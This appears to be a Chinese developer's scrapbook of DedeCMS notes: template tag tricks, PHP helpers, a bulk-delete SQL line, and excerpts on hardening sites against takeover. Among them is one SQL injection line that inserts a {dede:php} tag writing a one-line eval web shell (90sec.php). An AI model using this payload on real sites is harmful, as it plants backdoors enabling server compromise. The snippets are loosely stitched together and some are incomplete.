欢迎各位兄弟 发布技术文章
这里的技术是共享的
点评
dede_arctype 表
字段 sitepath 表示的是多站点的路径 ,开启多站点时才用到它
http://help.dedecms.com/dbdoc/v57/http://help.dedecms.com/v53/archives/extend/commontable/http://help.dedecms.com/develop/2011/0712/160.htmlhttp://help.dedecms.com/dbdoc/v57/ ----有大用
$str 就是body的内容
function getBodyImg($matches){ $path= getReferImgWidthMax($matches[2],'210','auto'); return "<img src='".$path."' alt='图像' />"; }//body里面把图像变小function bodylitterimg($str){ return preg_replace_callback('/<img(.*)src=["\']([^>]+)["\'](.*)\/>/misU','getBodyImg',$str); }
在我们自定义的php include 模板htm文件中
我们要在这个htm文件中包含htm文件
使用
<?php pasterTempletDiy("/shipingzhong/zxbm-headerjscss.htm"); ?>
我们同时在 helper中定义 pasterTempletDiy函数
$GLOBALS 在任意地方都可以取得到1)第一种方法
dedecms aaa.php 中使用变量 在 模板文件 aaa.htm中 输出的方法
在 php中
$backStr = "AAA";
$GLOBALS['backStr']=$backStr;
php 中 include(DEDETEMPLATE."/$cfg_df_style/aaa.htm");
在 aaa.html 文件中进行
<?php pasterTempletDiy("/default/aaa-moban .htm"); ?>
再在aaa-moban.htm中使用 {dede:global.backStr/}
键清空dedecms内容回收站方法(使用系统版本:v57、v56、 v55 测试通过):
后台->系统->SQL命令行工具 中运行:delete dede_addonarticle,dede_archives,dede_arctiny from dede_addonarticle,dede_archives,dede_arctiny where dede_addonarticle.aid=dede_archives.id and dede_arctiny.id=dede_archives.id and dede_archives.arcrank=’-2′
注意事项:但凡是手工操作数据库,先做一下数据库备份。
来自 http://www.yulijun.com/dedecms-empty-the-recycle-bin.html
<?phprequire_once 'safe.php';$_GET=safe_func_array($_GET);$_POST=safe_func_array($_POST);require_once(dirname(__FILE__)."/config.php");require_once(DEDEINC."/dedetag.class.php");require_once(DEDEINC."/userlogin.class.php");require_once(DEDEINC."/customfields.func.php");require_once(DEDEMEMBER."/inc/inc_catalog_options.php");require_once(DEDEMEMBER."/inc/inc_archives_functions.php");require_once (dirname(__FILE__) . "/../include/common.inc.php");
http://www.dedecms.com/archives/templethelp/help/index.htm 模板标记帮助http://www.dedecms.com/archives/templethelp/help/taghelp.htm 模板标记帮助http://help.dedecms.com/v53/archives/functions/dedetemplate/ http://www.dedecms.com/archives/templethelp/help/
很多站长朋友应该能发现,织梦CMS好像没法针对单篇文章指定独立的模板文件,默认只能从其所属栏目的设置获取相应的模板文件路径进 行解析,本人刚开始原本以为若要增加此功能的话还得先给附加表添加额外的一个字段了,无意中看到附加表结构中已有一个叫“templet”的字段了,翻看 了下官方的数据字典说明,才发现这个字段就是用来存放自定义模板的,可后台怎么就没有相应的表单项呢?
1)在head内加
<script language="javascript" type="text/javascript" src="{dede:global.cfg_cmsurl/}/include/dedeajax2.js"></script>
2)在head内加
edeCMS模板标签系统选项cfg_disable_tags,cfg_disable_funs
cfg_disable_tags,模板引擎禁用标签
用于控制哪些模板标签无法被加载,所有支持的模板标签可见系统目录下的“include\taglib”,默认php标签是被禁用的。
如果您对网站安全及PHP有一定的了解可以在后台[系统基本设置]中的“其他选项”中进行设置,如果需要禁用多个标签使用英文字符下的“,”进行分割。
http://www.114best.com/ip/114.aspx?w=118.25.5.11
http://tool.chinaz.com/Same/
dedeCms 新版本有了很多改变,其一就是后台登录页面多了很多广告,跟以前织梦清爽的页面完全不一样了,让人很不适应,只能删掉了。
知名第三方漏洞报告平台乌云再度曝光DedeCMS(织梦)建站系统SQL注入漏洞(http://zone.wooyun.org/content/2414)。攻击者可以借此漏洞实施攻击,直接窃取服务器数据。
随着Linux服务器应用范围越来越广泛,国内很多站长也开始使用它作为自己的Web服务器,本篇就来介绍如何在Linux系统环境下安装配置DedeCMS系统。
DedeCms做为国内使用最为广泛使用人数最多的CMS之一,经常爆出漏洞,每个漏洞的爆出,影响都是一大片,轻则被人挂广告、弹框,重则服务器成为肉机,宝贵数据丢失。那么有什么办法可以提高DedeCms的安全性呢?
先来看看原因吧,为什么PHP程序经常出漏洞,其实是由PHP程序本身决定的。PHP可复用性低,导致程序结构错综复杂,到处是冗余代码,这样 不仅利于漏洞的产生,还影响漏洞的修得;PHP程序入门简单且普遍开源,导致很多人都可直接阅读代码,搜寻漏洞;这样便有源源不断的漏洞被发现、被修复、 被发现……。而当前流行的PHP系统习惯用以文件形式做为缓存,这样就需要开放文件的写权限,这无疑成为PHP系统的软肋。目前针对PHP系统的攻击方 式,除了已经很少出现的“注入”攻击外,大部分攻击都是通过系统的某个漏洞,向可写文件里插入一句话木马,以此方式获得shell。
把所有可能 被侵入的文件夹 及里面的文件 改成 755 吧
mytag` (aid,expbody,normbody) VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,”<?php eval($_POST[guige]);?>”);{/dede:php}’) # @`\’`
dedecms建站是让广大朋友又爱又恨。爱是因为织梦dedecms的易用性,恨是因为使用dedecms网站的容易被挂马。估计使用dedecms建站的朋友80%被挂马过吧,当然我也是。一般是直接加入黑链就是js中被加入恶意转向。
织梦DEDECMS网站安全设置
data目录是系统缓存和配置文件的目录,一般都有可以读写的权限,只要是能够写入的目录都可能存在安全隐患,很多站长甚至给予这个目录可执行的权限,更 是非常危险,所以我们建议将这个data目录搬移出Web可访问目录之外。本篇将介绍如何将data目录搬移出Web访问目录。
我们这里举例“D:\dedecms\v57”为我们系统的根目录,我们需要将目录下的data文件夹(如图1)迁移要上一级目录(非Web目录),简单的办法直接剪切或者拷贝即可。
下面是一种正确的htaccess的写法
dedecms DDOS挂马漏洞的解决方法
到年底了,不知不觉过的太快了,最近俺的几个网站受到了机房的严重警告,让我意想不到的是,机房那面竟然说我的网站被挂马了,网站流量总是不断的往外发包,怎么也想不通,网站都稳定运行了好几年了,从没遇到过被挂马这一说,于是我整整工作了三天三夜终于把问题的根源找到了,也是本文的标题 “dedecms ddos挂马漏洞的解决办法”所要讲的。下面我给大家详细的介绍一下我的解决办法,希望遇到这种情况的站长童鞋们,遇到这种问题也能迎刃而解。
Dedecms是国内最有名的php开源系统,也是我用的最多的一个系统,简单实用稳定是我使用了多年的理由,正因为dedecms的开源,也导致了很多黑客盯上了这个程序,没日没夜的研究dedecms的漏洞,也就在最近终于爆发了,很多dedecms的网站都被挂马了,有的被机房警告,重的被机房强行关站,数不胜数。我想说的是既然问题出现了我们就要去解决,只有解决了,你的网站才会长期稳定发展下去。 首先从问题的特征跟大家一一介绍。
被挂马的特征:打开自己的网站首页,用查看源代码的方式会发现自己的网站被增加了许许多多的黑链代码,黑链代码是最简单也最能让站长们看出来的,他无非就是友情链接的代码。
如要使标签的自定义的字段显示出来 库文件 include/arc.listview.class.php1)在标签中 dede:list 有addfields 在dede:arclist 有 addfields 和 channelid='1' 和 (typeid 它好像是可以不要的)2)在后台 内容模型管理 中 基本设置 列表附加字段
一、修改{dede:field name='position'/}的文字间隔符,官方默认的是> 在include/typelink.class.php第101行左右将>修改为你想要的符号即可二、去掉{dede:field name='position' /}最后的分隔符> {dede:field name='position' runphp='yes'}$a=mb_strlen(@me);//计算字符串的长度@me=cn_substr(@me,$a-2,-1);//截取字符{/dede:field}三、{dede:field name='position'/} 中去掉 > 并去掉最后一个文本的链接的解决方案{dede:field name='position' runphp='yes'} $tc=" > "; $tf=split($tc,@me);
@me=(empty(@me['litpic'])) ? "" : "<p class='tufloat'><img src='".getReferImg("{@me['litpic']}",121,92)."' alt='{@me['title']}'/></p>";
上面的代码是ok
[field:array runphp='yes'] global $tid; $currentTypeId = $tid; if($currentTypeId == 48){ @me="{@me['typelink']}";//可以 @me=@me['typelink'];//可以 @me=@me['typelink'];//不可以 } else { }[/field:array]在D:\xampp\htdocs\dedecmsv56GBK\uploads\include\taglib\type.lib.php 文件中 增加 $row['array']字段
